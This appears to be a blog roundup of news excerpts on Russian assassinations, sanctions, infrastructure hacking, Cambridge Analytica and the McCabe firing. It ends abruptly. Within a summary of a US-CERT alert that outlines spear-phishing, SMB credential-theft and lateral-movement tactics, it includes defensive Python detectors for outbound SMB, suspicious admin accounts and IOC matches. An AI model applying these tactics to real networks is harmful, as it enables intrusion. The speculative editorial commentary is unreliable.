Assassinations of Russians, a Trend or Long Game?

A registry of foreign agents for Russia, compiled by the Justice Department, includes many of Washington’s most powerful legal, communications and lobbying firms, including Sidley Austin, Venable, APCO and White & Case. A review of those records by the Center for Responsive Politics found 279 registrations of Russian agents in the United States. More here.

***

“Putin’s inner circle is already subject to personal U.S. sanctions, imposed over Russia’s 2014 annexation of Ukraine’s Crimea region,” the Reuters news agency points out. … “But the so-called ‘oligarchs’ list’ that was released on Tuesday … covers many people beyond Putin’s circle and reaches deep into Russia’s business elite.”

Prime Minister Dmitry Medvedev is among the 114 senior political figures in Russia’s government who made the list, along with 42 of Putin’s aides, Cabinet ministers such as Foreign Minister Sergey Lavrov, and top officials in Russia’s leading spy agencies, the FSB and GRU. The CEOs of major state-owned companies, including energy giant Rosneft and Sberbank, are also on the list.

So are 96 wealthy Russians deemed “oligarchs” by the Treasury Department, which said each is believed to have assets totaling $1 billion or more. Some are the most famous of wealthy Russians, among them tycoons Roman Abramovich and Mikhail Prokhorov, who challenged Putin in the 2012 election. Aluminum magnate Oleg Deripaska, a figure in the Russia investigation over his ties to former Trump campaign chairman Paul Manafort, is included.

Russian Deputy Prime Minister Arkady Dvorkovich dismissed the list as simply a “who’s who” of Russian politics. He told Russian news agencies Tuesday he wasn’t surprised to find his name on the list, too, saying that it “looks like a ‘who’s who’ book.” Dvorkovich stopped short of saying how Russia would react to it, saying the Kremlin would “monitor the situation.” More here.

***

So when there are murder cases of Russian asylees in Britain, what are the agencies in the United States thinking?

Putin foe shot dead on Moscow street | New York Post

Litvinenko: Not first Putin critic to end up dead - CNN.com

Well, there was Mikhail Lesin, a former friend of Putin found dead in his hotel in Dupont Circle, Washington DC. Then there was Operation Ghost Stories, the massive spy swap.

Imagine what the context and case references are for the FBI when it comes to Russian operations in the United States and in allied countries. Or how many planes have been shot out of the sky where clues and evidence point to Russia? More explained in video below.

Beyond the attempted assassination of Skripal and his daughter in Salisbury two weeks ago, there was yet another confirmed death.

Whoever is behind the murder of a prominent Russian exile, who believed he was on a Kremlin hit list, managed to get inside his home without breaking in, police believe.

Nikolai Glushkov, 68, was found dead last week at his home in southwest London, and officers are now hunting for the culprits. His official cause of death is “compression to the neck.”

Before his death, Glushkov warned that a close friend of his had been murdered, and that he would be next.

In a Monday morning update on the investigation, the Metropolitan Police said they examined Glushkov’s house and found no signs of forced entry.

***

How bad is this trend?

4 Days of Food Left…Panic? National Grid Hacked

If there is no transportation, there is no food, medicine or basic supplies… what country is ready to deal with this?

British cities would be uninhabitable within days and the country is only a few meals from anarchy if the National Grid was taken down in a cyber attack or solar storm, disaster and security experts have warned.

Modern life is so reliant on electricity that a prolonged blackout would quickly lead to a loss of water, fuel, banking, transport and communications that would leave the country “in the Stone Age”.

Russia plot to cut off UK with hackers taking down ...

The warning comes weeks after the Defence Secretary, Gavin Williamson, said Russia had been spying on the UK’s energy infrastructure and could cause “thousands and thousands and thousands” of deaths if it crippled the power supply.

***

The U.S. government has just released an important cybersecurity alert that confirms Russian government cyberattacks targeting energy and other critical infrastructure sectors in the United States.

While there has recently been a significant rise in cyberattacks in these industries, up to now we’ve only been able to speculate on who the actors are, or what their motives may be. In this case the threat actor and their strategic intent has been clearly confirmed, something the U.S. government rarely does publicly.

In addition, the US-CERT alert provides descriptions of each stage of the attack, detailed indicators of compromise (IOCs), and a long list of detection and prevention measures. Many of the attack tactics resemble those of Dragonfly 2.0, so much so that one might call this an expanded playbook for Dragonfly. The Nozomi Networks solution ships today with an analysis toolkit that identifies the presence of Dragonfly 2.0 IOCs.

This article is intended to help you gain perspective on this recent alert, provide additional guidance on what security measures to take, and describe how the Nozomi Networks solution can help.

U.S. energy facilities, like this one, are one of the critical infrastructure targets of the Russian cyberattacks.

Multi-Stage Campaigns Provide Opportunities for Early Detection

The US-CERT alert characterizes this attack as a multi-stage cyber intrusion campaign in which Russian cyber actors conducted spear phishing and gained remote access into targeted industrial networks. After obtaining access, the threat actors conducted network reconnaissance, moved laterally, and collected information pertaining to Industrial Control Systems (ICS).

This pattern of behavior is typical of APTs (Advanced Persistent Threats). APTs occur over an extended period, meaning there is an opportunity to detect and stop them before damage is done. With the right technology monitoring the industrial network, it is much harder for them to go unobserved before their final attack.

In this case the Russian cyberattacks started by infecting staging targets: peripheral organizations, such as trusted third-party suppliers, that then served as pivot points for attacking the final intended targets.

The attackers used a multitude of tactics involving information relevant to industrial control professionals for initial infection of the staging targets. Examples include:

  • Altering trade publication websites
  • Sending emails containing resumes for ICS personnel as infected Microsoft Word attachments
  • Analyzing publicly available photos that inadvertently contained information about industrial systems

The credentials of staging targets’ staff were in turn used to send spear phishing emails to the staff of the intended targets. They received malicious .docx files, which communicated with a command and control (C2) server to steal their credentials.

The SMB (Server Message Block) network protocol was used throughout the spear phishing phases to communicate with external servers, as was described for the Dragonfly 2.0 attacks. This is a distinctive tactic. SMB is usually only used to communicate within LANs, not for outbound communications. Now that this is known, asset owners should ensure their firewalls are locked down for outbound service restrictions.
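The outbound-SMB check the paragraph above recommends can be run retroactively over existing firewall or flow logs. The following is an added example written for this page, not code from the original post, the US-CERT alert or any vendor product. It assumes a key=value firewall log format (the sample lines are constructed) and treats RFC 1918 space plus loopback as "internal"; SMB runs on TCP 445 (and 139 for SMB over NetBIOS), so any TCP connection to those ports with an external destination is reported.

```python
"""Flag outbound SMB in firewall or flow logs.

Added example (not code from the original post, the US-CERT alert, or any
vendor product). It assumes a key=value firewall log format, constructed
below, and treats RFC 1918 space plus loopback as "internal". SMB (TCP 445,
and 139 for SMB over NetBIOS) is expected only inside the LAN, so a TCP
connection to those ports with an external destination is worth a look.
"""
import ipaddress
from typing import Dict, List

SMB_PORTS = {445, 139}

# Internal ranges are listed explicitly rather than via ip_address().is_private,
# because Python also classes the RFC 5737 documentation ranges as private.
INTERNAL_NETS = [
    ipaddress.ip_network(n)
    for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")
]

# Constructed sample log, one connection per line (203.0.113.0/24 stands in
# for arbitrary internet hosts).
SAMPLE_LOG = """\
ts=2018-03-15T10:01:02Z src=10.20.30.40 dst=10.20.30.5 proto=tcp dport=445 action=allow
ts=2018-03-15T10:01:09Z src=10.20.30.40 dst=203.0.113.25 proto=tcp dport=445 action=allow
ts=2018-03-15T10:02:11Z src=10.20.30.41 dst=203.0.113.9 proto=tcp dport=443 action=allow
ts=2018-03-15T10:03:45Z src=192.168.1.15 dst=203.0.113.77 proto=tcp dport=139 action=allow
ts=2018-03-15T10:04:00Z src=192.168.1.15 dst=192.168.1.20 proto=udp dport=137 action=allow
ts=2018-03-15T10:05:30Z src=10.20.30.40 dst=203.0.113.25 proto=tcp dport=445 action=deny
"""


def parse_line(line: str) -> Dict[str, str]:
    """Split a 'k=v k=v ...' log line into a dict."""
    return dict(field.split("=", 1) for field in line.split())


def is_internal(ip: str) -> bool:
    """True if the address falls inside one of the configured internal ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def find_outbound_smb(log_text: str) -> List[Dict[str, str]]:
    """Return the records of TCP connections to SMB ports with an external destination.

    Allowed and denied connections are both returned: a deny shows the firewall
    rule is working, an allow shows a gap in the outbound policy.
    """
    hits = []
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        rec = parse_line(raw)
        if rec.get("proto") != "tcp":
            continue
        try:
            dport = int(rec["dport"])
            external = not is_internal(rec["dst"])
        except (KeyError, ValueError):
            continue  # malformed line: skip rather than crash the sweep
        if dport in SMB_PORTS and external:
            hits.append(rec)
    return hits


def sources_with_allowed_outbound_smb(log_text: str) -> List[str]:
    """Internal hosts that actually completed an outbound SMB connection (action=allow)."""
    return sorted({h["src"] for h in find_outbound_smb(log_text) if h["action"] == "allow"})


if __name__ == "__main__":
    for hit in find_outbound_smb(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['src']} -> {hit['dst']}:{hit['dport']} ({hit['action']})")
    print("hosts needing review:", sources_with_allowed_outbound_smb(SAMPLE_LOG))
```

Hosts that appear in the allowed list have already talked SMB to the internet and should be treated as possible victims of the credential-theft document described above, not just as a firewall-policy finding.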

The credentials of the intended targets were used to access victims’ networks. From there, the malware established multiple local administrator accounts, each with a specific purpose. The goals ranged from creation of additional accounts to cleanup activity. For the report, click here.

***

What Is Known

Forensic analysis shows that the threat actors sought information on network and organizational design and control system capabilities within the organization. In one instance, the report says, the threat actors downloaded a small photo from a publicly accessible human resource page, which, when expanded, was a high-resolution photo that displayed control systems equipment models and status information in the background. The threat actors also compromised third-party suppliers to download source code for several intended targets’ websites. They also attempted to remotely access corporate web-based email and virtual private network (VPN) connections.

Once inside the intended target’s network, the threat actors used privileged credentials to access domain controllers via remote desktop protocols (RDP) and then used batch scripts to enumerate hosts and users, as well as to capture screenshots of systems across the network.
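Both the creation of purpose-built local administrator accounts described earlier and the RDP access to domain controllers described in the paragraph above leave a trail in the Windows Security log. The following is an added example written for this page, not code from the alert or from any vendor. It assumes Security log records already parsed into dicts (for instance from an EVTX export) carrying the standard fields of these event IDs: 4720 (user account created), 4732 (member added to a security-enabled local group) and 4624 (successful logon, where LogonType 10 is RemoteInteractive, i.e. RDP). Host names, account names, times and the domain-controller list are constructed sample data.

```python
"""Correlate Windows Security events for rapid local-admin creation and RDP
logons to domain controllers.

Added example, not code from the alert or from any vendor. Event IDs are the
standard Windows ones: 4720 user account created, 4732 member added to a
security-enabled local group, 4624 logon (LogonType 10 = RemoteInteractive,
i.e. RDP). All hosts, accounts, times and the DC list are constructed.
"""
from datetime import datetime
from typing import Dict, List, Tuple

DOMAIN_CONTROLLERS = {"DC01", "DC02"}  # constructed asset inventory

# In real 4732 events the member is given as a SID (MemberSid); the sample
# assumes it has already been resolved into MemberName.
SAMPLE_EVENTS: List[Dict] = [
    {"EventID": 4720, "Computer": "WS-ENG-07", "TimeCreated": "2018-03-10T02:14:05",
     "TargetUserName": "svc_backup2", "SubjectUserName": "jdoe"},
    {"EventID": 4732, "Computer": "WS-ENG-07", "TimeCreated": "2018-03-10T02:14:09",
     "TargetUserName": "Administrators", "MemberName": "WS-ENG-07\\svc_backup2",
     "SubjectUserName": "jdoe"},
    {"EventID": 4720, "Computer": "WS-HR-02", "TimeCreated": "2018-03-10T09:30:00",
     "TargetUserName": "newhire", "SubjectUserName": "helpdesk"},
    {"EventID": 4624, "Computer": "DC01", "TimeCreated": "2018-03-10T02:20:30",
     "TargetUserName": "svc_backup2", "LogonType": 10, "IpAddress": "10.20.30.40"},
    {"EventID": 4624, "Computer": "DC01", "TimeCreated": "2018-03-10T08:00:00",
     "TargetUserName": "admin.ops", "LogonType": 2, "IpAddress": "-"},
    {"EventID": 4624, "Computer": "WS-ENG-07", "TimeCreated": "2018-03-10T08:05:00",
     "TargetUserName": "jdoe", "LogonType": 10, "IpAddress": "10.20.30.99"},
]


def _ts(event: Dict) -> datetime:
    return datetime.fromisoformat(event["TimeCreated"])


def _account(member: str) -> str:
    """'HOST\\name' or 'DOMAIN\\name' -> 'name', lower-cased for comparison."""
    return member.rsplit("\\", 1)[-1].lower()


def find_fast_admin_promotions(events: List[Dict], window_seconds: int = 300) -> List[Tuple[str, str, int]]:
    """Accounts created and then added to the local Administrators group on the
    same host within `window_seconds`. Returns (computer, account, seconds)."""
    promotions = []
    created = [e for e in events if e["EventID"] == 4720]
    added = [e for e in events if e["EventID"] == 4732
             and e.get("TargetUserName", "").lower() == "administrators"]
    for c in created:
        for a in added:
            if a["Computer"] != c["Computer"]:
                continue
            if _account(a.get("MemberName", "")) != c["TargetUserName"].lower():
                continue
            delta = (_ts(a) - _ts(c)).total_seconds()
            if 0 <= delta <= window_seconds:
                promotions.append((c["Computer"], c["TargetUserName"], int(delta)))
    return promotions


def find_rdp_logons_to_dcs(events: List[Dict], dcs=DOMAIN_CONTROLLERS) -> List[Dict]:
    """4624 events with LogonType 10 (RDP) whose target host is a domain controller."""
    return [e for e in events
            if e["EventID"] == 4624 and e.get("LogonType") == 10 and e["Computer"] in dcs]


def accounts_of_concern(events: List[Dict]) -> List[str]:
    """Accounts that were both rapidly promoted and later used for RDP into a DC."""
    promoted = {acct.lower() for _, acct, _ in find_fast_admin_promotions(events)}
    rdp_users = {e["TargetUserName"].lower() for e in find_rdp_logons_to_dcs(events)}
    return sorted(promoted & rdp_users)


if __name__ == "__main__":
    for host, acct, secs in find_fast_admin_promotions(SAMPLE_EVENTS):
        print(f"{host}: {acct} made local admin {secs}s after creation")
    for e in find_rdp_logons_to_dcs(SAMPLE_EVENTS):
        print(f"RDP to {e['Computer']} as {e['TargetUserName']} from {e['IpAddress']}")
    print("accounts of concern:", accounts_of_concern(SAMPLE_EVENTS))
```

Either signal alone produces noise (help desks create accounts, administrators use RDP); the intersection of a freshly promoted account with an RDP logon to a domain controller is what narrows the list to something an analyst can work through.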

The threat is inside. US-CERT on March 15 warned that threat actors associated with the Russian government had infiltrated ICS and SCADA systems at power plants using a variety of tactics. This image is a DHS reconstruction of a screenshot fragment of a human machine interface (HMI) that the threat actors accessed. Source: US-CERT

Along with publishing an extensive list of indicators of compromise, the DHS and FBI recommended that network administrators review IP addresses, domain names, file hashes, network signatures, and a consolidated set of YARA rules for malware associated with the intrusion authored by the National Cybersecurity and Communications Integration Center. YARA is an open-source and multiplatform tool that provides a mechanism to exploit code similarities between malware samples within a family.
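Reviewing the published IP addresses, domain names and file hashes against local telemetry is mechanical work that is easy to get subtly wrong (subdomain matching, trailing dots, case). The following is an added example written for this page, not code from the alert, DHS/FBI or NCCIC, and it covers the hash, domain and IP indicators only; the YARA rules the alert mentions are run with the yara tool itself. Every indicator and log line is constructed: RFC 5737 addresses, hostnames under the reserved .invalid TLD, and the SHA-256 of a harmless constructed byte string, since this page does not reproduce the alert's real IOC package.

```python
"""Sweep proxy logs and files against a consolidated IOC list.

Added example, not code from the alert, DHS/FBI or NCCIC. Every indicator and
log line here is constructed: RFC 5737 addresses, hostnames under the reserved
.invalid TLD, and the SHA-256 of a harmless constructed byte string. Real
indicators would come from the alert's IOC package, which is not reproduced.
"""
import hashlib
from typing import Dict, List, Set, Tuple

IOC_DOMAINS: Set[str] = {"update-portal.example.invalid", "cdn.example.invalid"}
IOC_IPS: Set[str] = {"203.0.113.25", "198.51.100.77"}

# Stand-in for a file hash from an IOC list: hash of a constructed byte string.
CONSTRUCTED_SAMPLE = b"constructed sample payload, not real malware"
IOC_SHA256: Set[str] = {hashlib.sha256(CONSTRUCTED_SAMPLE).hexdigest()}

# Constructed proxy log: "timestamp client host dest_ip status"
SAMPLE_PROXY_LOG = """\
2018-03-15T11:00:01Z 10.20.30.40 www.example.com 192.0.2.10 200
2018-03-15T11:00:07Z 10.20.30.40 mail.cdn.example.invalid 192.0.2.11 200
2018-03-15T11:01:30Z 10.20.30.41 files.example.org 203.0.113.25 200
2018-03-15T11:02:45Z 10.20.30.42 notcdn.example.invalid 192.0.2.12 200
"""


def domain_matches(host: str, indicators: Set[str]) -> bool:
    """Exact match or a subdomain of an indicator. 'notcdn.example.invalid'
    must not match 'cdn.example.invalid', so compare on label boundaries."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in indicators)


def scan_proxy_log(log_text: str) -> List[Tuple[str, str, str]]:
    """Return (client, matched_value, reason) for each line touching an indicator."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 5:
            continue  # skip malformed lines
        _ts, client, host, dest_ip, _status = parts[:5]
        if domain_matches(host, IOC_DOMAINS):
            hits.append((client, host, "domain"))
        if dest_ip in IOC_IPS:
            hits.append((client, dest_ip, "ip"))
    return hits


def sha256_of(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def scan_files(files: Dict[str, bytes]) -> List[str]:
    """Paths whose SHA-256 is on the indicator list. A hash indicator only ever
    matches an unmodified copy of the sample, which is why YARA rules matter."""
    return sorted(path for path, data in files.items() if sha256_of(data) in IOC_SHA256)


if __name__ == "__main__":
    for client, value, reason in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(f"{client} -> {value} ({reason} indicator)")
    constructed_files = {  # constructed paths and contents
        r"C:\Users\Public\update.exe": CONSTRUCTED_SAMPLE,
        r"C:\Users\Public\readme.txt": b"nothing to see here",
    }
    print("files matching hash IOCs:", scan_files(constructed_files))
```

Hash indicators are the most brittle of the three: a single recompiled byte defeats them, which is why the alert pairs them with YARA rules that key on code features shared across a malware family rather than on one exact file.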

Facebook, Artificial Intelligence Op, Manipulating You

Is any of this illegal? Well, yet to be determined because no one asks the questions, much less do we know what questions to ask….

It boils down to this: ‘facts don’t matter, it is what readers believe’, or, as in A Few Good Men, in a dream world it does not matter what I believe, it matters what I can prove. Artificial intelligence is proven, believed and kinda sorta factual?

Facebook says it has saved more than $2 billion from its investments in Open Compute. But five years is an eternity on the Internet, and now every big tech company is out to conquer a different problem. Serving up content cheaply can be done, but figuring out what kind of content to serve among billions of posts is still a challenge. So, just as Facebook set out to rebuild the hardware industry half a decade ago with the Open Compute project, it has more recently created an internal platform to harness artificial intelligence so it can deliver exactly the content you want to see. And it wants to build this “machine learning” platform to scale. (“Machine learning” is a form of artificial intelligence that allows computers to learn how to operate without being pre-programmed.) “We’re trying to build more than 1.5 billion AI agents—one for every person who uses Facebook or any of its products,” says Joaquin Candela, the head of the newly created Applied Machine Learning group. “So how the hell do you do that?”

FBLearner Flow combines several machine-learning models to process several billion data points, drawn from the activity of the site’s 1.5 billion users, and forms predictions about thousands of things: which user is in a photograph, which message is likely to be spam. The algorithms created from FBLearner Flow’s models help define what content appears in your News Feed and what advertisements you see.

It would be easy to jump to the conclusion that Facebook’s use of artificial intelligence will help eliminate some of the company’s 13,000 employees. The reality couldn’t be more different, says chief technology officer Mike Schroepfer. AI is helping Facebook augment the capabilities of its human engineers. “We’re able to do things that we have not been able to do before,” he says. More here.

***

Stop clicking the bait on Facebook; you are participating in psychometric testing for Facebook.

Predicting individual traits and attributes based on various cues, such as samples of written text (8), answers to a psychometric test (9), or the appearance of spaces people inhabit (10), has a long history. Human migration to the digital environment renders it possible to base such predictions on digital records of human behavior. It has been shown that age, gender, occupation, education level, and even personality can be predicted from people’s Web site browsing logs (11–15). Similarly, it has been shown that personality can be predicted based on the contents of personal Web sites (16), music collections (17), properties of Facebook or Twitter profiles such as the number of friends or the density of friendship networks (18–21), or language used by their users (22). Furthermore, location within a friendship network at Facebook was shown to be predictive of sexual orientation (23).

This study demonstrates the degree to which relatively basic digital records of human behavior can be used to automatically and accurately estimate a wide range of personal attributes that people would typically assume to be private. The study is based on Facebook Likes, a mechanism used by Facebook users to express their positive association with (or “Like”) online content, such as photos, friends’ status updates, Facebook pages of products, sports, musicians, books, restaurants, or popular Web sites. Likes represent a very generic class of digital records, similar to Web search queries, Web browsing histories, and credit card purchases. For example, observing users’ Likes related to music provides similar information to observing records of songs listened to online, songs and artists searched for using a Web search engine, or subscriptions to related Twitter channels. In contrast to these other sources of information, Facebook Likes are unusual in that they are currently publicly available by default. However, those other digital records are still available to numerous parties (e.g., governments, developers of Web browsers, search engines, or Facebook applications), and, hence, similar predictions are unlikely to be limited to the Facebook environment. More here.

***

Everything you need to know about Facebook and Cambridge ...

So why does Facebook feel like it is a victim of Cambridge Analytica? Well, it seems Cambridge Analytica was a customer of Facebook and bought customer data for their own use. Facebook feels betrayed, but how about that relationship? Facebook censors and mines data for their own political missions, and frankly Cambridge Analytica does the same thing. These two companies, along with several others and hired outside data and espionage types, are changing the whole balance and equilibrium of the globe; the question is to what end?

***

The data company that helped push Donald Trump to victory is now hoping it will win two lucrative contracts to boost White House policy messaging and to expand sales for the Trump Organization.

Cambridge Analytica, a data mining firm that uses personality profiling, claims Steve Bannon as a board member, who will soon officially be Mr Trump’s chief strategist.

The firm is backed by billionaire investor Robert Mercer, whose daughter Rebekah sits on the 16-person Trump transition team.

The London-based firm said it has marketing and psychological data on around 230 million Americans, which could help Mr Trump to increase his real estate business, or scope out the policy landscape for his government. More here.

In case you are wondering about global opposition research and affecting power to power with global leaders, check out this video:

Now this cat may appear to be quite an odd whistleblower but….

Christopher Wylie, who worked for data firm Cambridge Analytica, reveals how personal information was taken without authorisation in early 2014 to build a system that could profile individual US voters in order to target them with personalised political advertisements. At the time the company was owned by the hedge fund billionaire Robert Mercer, and headed at the time by Donald Trump’s key adviser, Steve Bannon. Its CEO is Alexander Nix.

Details on the Firing of FBI Dep. Director Andrew McCabe

Just after midnight Saturday, President Donald Trump reacted to the news in a Twitter message:

“Andrew McCabe FIRED, a great day for the hard working men and women of the FBI – A great day for Democracy,” the president wrote, “Sanctimonious James Comey was his boss and made McCabe look like a choirboy. He knew all about the lies and corruption going on at the highest levels of the FBI!” More detail here including the timeline with former FBI Director James Comey.

The termination, which was triggered by internal reviews and comes a little more than a day before McCabe was set to retire, sparks a war of words between McCabe and President Donald Trump.

Politico: Attorney General Jeff Sessions fired former FBI Deputy Director Andrew McCabe Friday night, dismissing the longtime bureau veteran who had been publicly pilloried by President Donald Trump and sparking a new war of words between McCabe and Trump.

Sessions said the firing — carried out a little more than a day before McCabe was set to retire from the FBI — was triggered by internal reviews that concluded McCabe violated Justice Department policies and was not forthcoming with investigators probing FBI actions before the 2016 presidential election.

Justice Department officials determined that “McCabe had made an unauthorized disclosure to the news media and lacked candor — including under oath — on multiple occasions,” the attorney general said in a statement.

“The FBI expects every employee to adhere to the highest standards of honesty, integrity, and accountability,” Sessions added.

McCabe quickly lashed back Friday, linking the firing to the repeated public flogging he faced from Trump. The former FBI No. 2 also tied his dismissal to the fact that he can support former FBI Director James Comey’s account that he was fired because of an unwillingness to shut down the investigation into the Trump campaign’s alleged ties to Russia.

“Here is the reality: I am being singled out and treated this way because of the role I played, the actions I took, and the events I witnessed in the aftermath of the firing of James Comey,” McCabe said in a statement. “The release of this report was accelerated only after my testimony to the House Intelligence Committee revealed that I would corroborate former Director Comey’s accounts of his discussions with the President.”

“The fact that [Trump] has said all these things about me, he’s made all these attacks, he’s gone on and on — you can’t dismiss it, that’s the problem,” McCabe told POLITICO in an interview earlier this month. “That’s why presidents don’t typically attack senior executives in the FBI, because they would never even want to create the impression that that sort of improper influence could be taking place.”

Shortly after midnight, Trump hit back, tweeting: “Andrew McCabe FIRED, a great day for the hard working men and women of the FBI – A great day for Democracy. Sanctimonious James Comey was his boss and made McCabe look like a choirboy. He knew all about the lies and corruption going on at the highest levels of the FBI!”

Prominent Democratic lawmakers expressed skepticism about Sessions’ decision, but seemed cautious about denouncing the action until Inspector General Michael Horowitz’s review is released. Many Democrats have praised Horowitz, whose office prepared the report that appears to have harshly criticized McCabe.

“In the absence of the IG report, it’s impossible to evaluate the merits of this harsh treatment of a 21-year FBI professional. That it comes after the President urged the DOJ to deprive McCabe of his pension, and after his testimony, gives the action an odious taint,” the top Democrat on the House Intelligence Committee, Adam Schiff of California, tweeted.

“I am going to reserve judgment on Mr. McCabe’s conduct until the Inspector General completes his report,” the House Judiciary Committee’s ranking Democrat, Jerrold Nadler of New York, said. “But I am certain that President Trump has attacked the reputation of a career public servant, and his wife, and the rest of the leadership of the Department of Justice—and those attacks leave us all questioning whether the Attorney General has made the right decision.”

By contrast, Rep. Lee Zeldin (R-N.Y.) quickly embraced Sessions’ move.

“Decisive, appropriate, timely action by @jeffsessions to fire Andrew McCabe. DOJ/FBI are legendary, historic, important agencies filled w/amazing men & women held to highest standards,” Zeldin wrote on Twitter. “McCabe was a ringleader of rogue actors who were a shameful exception at top; not the norm.”

Mark Meadows, the leader of the conservative House Freedom Caucus, said that McCabe’s termination showed the need to add another special counsel to probe the FBI.

“This decision is not surprising based on information that continues to unfold on a daily basis,” Meadows said.

The embattled FBI deputy, who was due to officially retire on Sunday, had stepped down in January after facing repeated public and private rebukes from the president. Trump criticized his handling of the Hillary Clinton email investigation and accused McCabe of bias, citing his wife’s political ties to a prominent Democrat.

McCabe has been at the center of a Justice Department inspector general examination of the bureau’s activities prior to the 2016 election, including the investigation into the Clinton email matter. The FBI’s Office of Professional Responsibility had recommended that McCabe be fired, citing findings from the Justice Department’s inspector general’s report, which is expected to be released within weeks.

Sessions’ statement did not detail the precise allegations against McCabe. However, the fired FBI official’s own statement and text messages released by the Senate Judiciary Committee indicate that investigators concluded he ordered the disclosure of information to a Wall Street Journal reporter about an ongoing investigation into the Clinton Foundation.

As McCabe was under fire over donations his wife received for her Democratic campaign for the Virginia Senate, he indicated he had pressed to keep the foundation-related probe advancing even as Justice Department officials questioned its merit.

“This entire investigation stems from my efforts, fully authorized under FBI rules, to set the record straight on behalf of the Bureau, and to make clear that we were continuing an investigation that people in DOJ opposed,” McCabe said. The disclosure “was not a secret, it took place over several days, and others, including the Director, were aware of the interaction with the reporter,” the former FBI No. 2 added.

McCabe has pushed back at the timing of the inspector general’s report, suggesting that Trump’s frequent criticism of him has driven the speed with which the investigation concluded with a recommendation to terminate him.

“I have never before seen the type of rush to judgment and rush to summary punishment that we have witnessed in this case,” McCabe’s attorney Michael Bromwich said in a statement. “This is simply not the way such matters are generally handled in the DOJ or the FBI. It is deeply disturbing.”

The president of the FBI Agents Association, Thomas O’Connor, issued a statement Friday night that appeared to express concern that politics may have influenced McCabe’s dismissal.

“While the FBIAA does not comment on personnel matters, the Association remains fully committed to ensuring that every FBIAA member is provided appropriate procedural protections. The FBIAA also strongly believes that personnel decisions should never be politicized,” O’Connor said.

Sessions’ statement indicated that the firing was also endorsed by the Justice Department’s top career official, Associate Deputy Attorney General Scott Schools. The statement did not indicate why the disciplinary process, which can often take more than a year, appears to have been dramatically accelerated in McCabe’s case.

After stepping down in January, McCabe went on “terminal leave,” intending to remain on the government payroll until his planned retirement on March 18. The firing is likely to cost McCabe hundreds of thousands of dollars by rendering McCabe ineligible for his full government pension and by delaying his right to any payout for almost seven years. Legal experts say McCabe’s options to challenge the firing are few because most FBI employees have little legal recourse against attempts to punish them over alleged misconduct.

A spokeswoman for McCabe declined to comment Friday night on whether he is planning a lawsuit.

McCabe told POLITICO earlier this month that he was “essentially removed from my job” in January following information “shared with” Christopher Wray, the FBI’s current director, “before the investigation was concluded.”

“I refused to serve in any other capacity other than deputy, and so I left on terminal leave,” McCabe said. Trump announced in June that he would nominate Wray to replace Comey. Wray took over the job in August, after being confirmed by the Senate.

Trump had questioned McCabe’s impartiality, citing the fact that his wife received funds from then-Virginia Gov. Terry McAuliffe, a Democrat and longtime political ally of Clinton, in a failed bid for the State Legislature in 2015.

“How can FBI Deputy Director Andrew McCabe, the man in charge, along with leakin’ James Comey, of the Phony Hillary Clinton investigation (including her 33,000 illegally deleted emails) be given $700,000 for wife’s campaign by Clinton Puppets during investigation?” Trump tweeted in December. Trump abruptly fired Comey as FBI director in May, saying he was “unable to effectively lead the Bureau.”

In a separate post, Trump added that McCabe was “racing the clock to retire with full benefits.”

Last summer, Trump questioned why Sessions had not already replaced McCabe, whom he labeled a “friend” of Comey’s.

The firing raised concerns about the integrity of the FBI’s examination of possible Russian election meddling in 2016 and potential ties to Trump campaign aides, an investigation that McCabe subsequently took charge of as acting director of the bureau.

McCabe began his bureau career at the New York field office in 1996. In January 2016, under former President Barack Obama, he was appointed to the bureau’s No. 2 position by Comey.

CERT/FBI Declaration of Russia Hacking U.S. Infrastructure

US sanctions Russia for election interference, cyberattacks

The US government takes action against Russia for misdeeds including what it’s calling the “most destructive cyberattack in history.”

CNet: The White House has announced an array of sanctions against Russia for meddling in US elections and for broader hacking efforts, including one incident it called the “most destructive and costly cyberattack in history.”

The US government unveiled the sanctions Thursday morning, saying they were prompted by Russia’s online propaganda campaign during the US elections, massive hacks of Yahoo and attempted cyberattacks against electrical grids in the US.

The government singled out Russia’s role in the NotPetya attack, a piece of malware that was disguised as ransomware but actually designed to destroy data. Last month, the Trump Administration attributed the attack to Russia, saying it caused billions of dollars in damage in Europe, Asia and the Americas.

“These targeted sanctions are a part of a broader effort to address the ongoing nefarious attacks emanating from Russia,” Treasury Secretary Steven Mnuchin said in a statement. The sanctions, he said, will “hold Russian government officials and oligarchs accountable for their destabilizing activities by severing their access to the US financial system.”

The sanctions come after an investigation by the Department of Homeland Security and the FBI.

The sanctions fall on 19 individuals and five Russian entities, including the Internet Research Agency, a trolling farm designed to meddle in the 2016 presidential election through divisive posts on social media. They also target Russia’s intelligence agency, known as the Federal Security Service or FSB, and the country’s military intelligence organization, the GRU.

The Russian embassy didn’t respond to a request for comment.

‘A long-overdue step’

On Capitol Hill, the sanctions fed into a continuing controversy over Russian meddling in American democratic processes.

“This is a welcome, if long-overdue, step by the Trump administration to punish Russia for interfering with the 2016 election,” Sen. Mark Warner, a Democrat from Virginia, said in a statement.

Still, the vice chairman of the Senate intelligence committee criticized the sanctions because they “do not go far enough,” pointing out that many of the named entities were either already sanctioned under the Obama administration or have been charged by the Justice Department.

“With the midterm elections fast approaching,” he said, “the Administration needs to step it up, if we have any hope of deterring Russian meddling in 2018.”

Senior national security officials said the FSB was directly involved in hacking millions of Yahoo accounts, while the GRU was behind the interference in the 2016 presidential election and the NotPetya cyberattack.

The sanctions fall under the Countering America’s Adversaries Through Sanctions Act, which authorizes pushback against “aggression by the governments of Iran, the Russian Federation and North Korea.”

Investigators found evidence of Russian attempts to hack into the US electric grid through spear-phishing tactics, senior national security officials said. The attacks have been going on since March 2016, targeting multiple US government offices, as well as energy, water, nuclear and critical manufacturing companies.

The DHS and the FBI provided details in a technical alert released Thursday, calling the actions a “multistage intrusion” through which Russian hackers were able to gain remote access into energy sector networks.

Systems Affected

  • Domain Controllers
  • File Servers
  • Email Servers

Overview

